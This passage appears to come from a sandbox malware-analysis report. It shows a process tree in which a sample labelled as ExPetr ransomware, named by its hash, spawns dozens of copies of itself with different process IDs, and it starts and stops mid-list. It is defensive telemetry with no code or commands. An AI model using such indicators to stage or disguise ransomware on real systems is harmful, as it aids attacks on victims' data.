      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9696
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9724
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9772
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9832
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9920
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9952
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10004
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10052
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10088
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10108
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10144
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10208
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9380
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3412
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5340
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5304
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4152
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5572
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9616
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4680
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9748
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8212
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5328
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:6164
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10072
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7584
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9252
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9128
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9404
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8816
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4016
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3868
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:1868
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8332
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7376
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9744
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8620
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:6828
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9292
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9052
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5368
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7816
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:6560
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9624
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3588
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9036
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9100
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9500
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4224
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3948
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:10044
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8124
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9416
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7328
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9248
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3540
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4512
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9860
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9520
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9884
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:1096
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9484
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3568
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3644
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:392
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8324
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5336
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4232
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7128
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3028
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9840
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9984
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9792
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
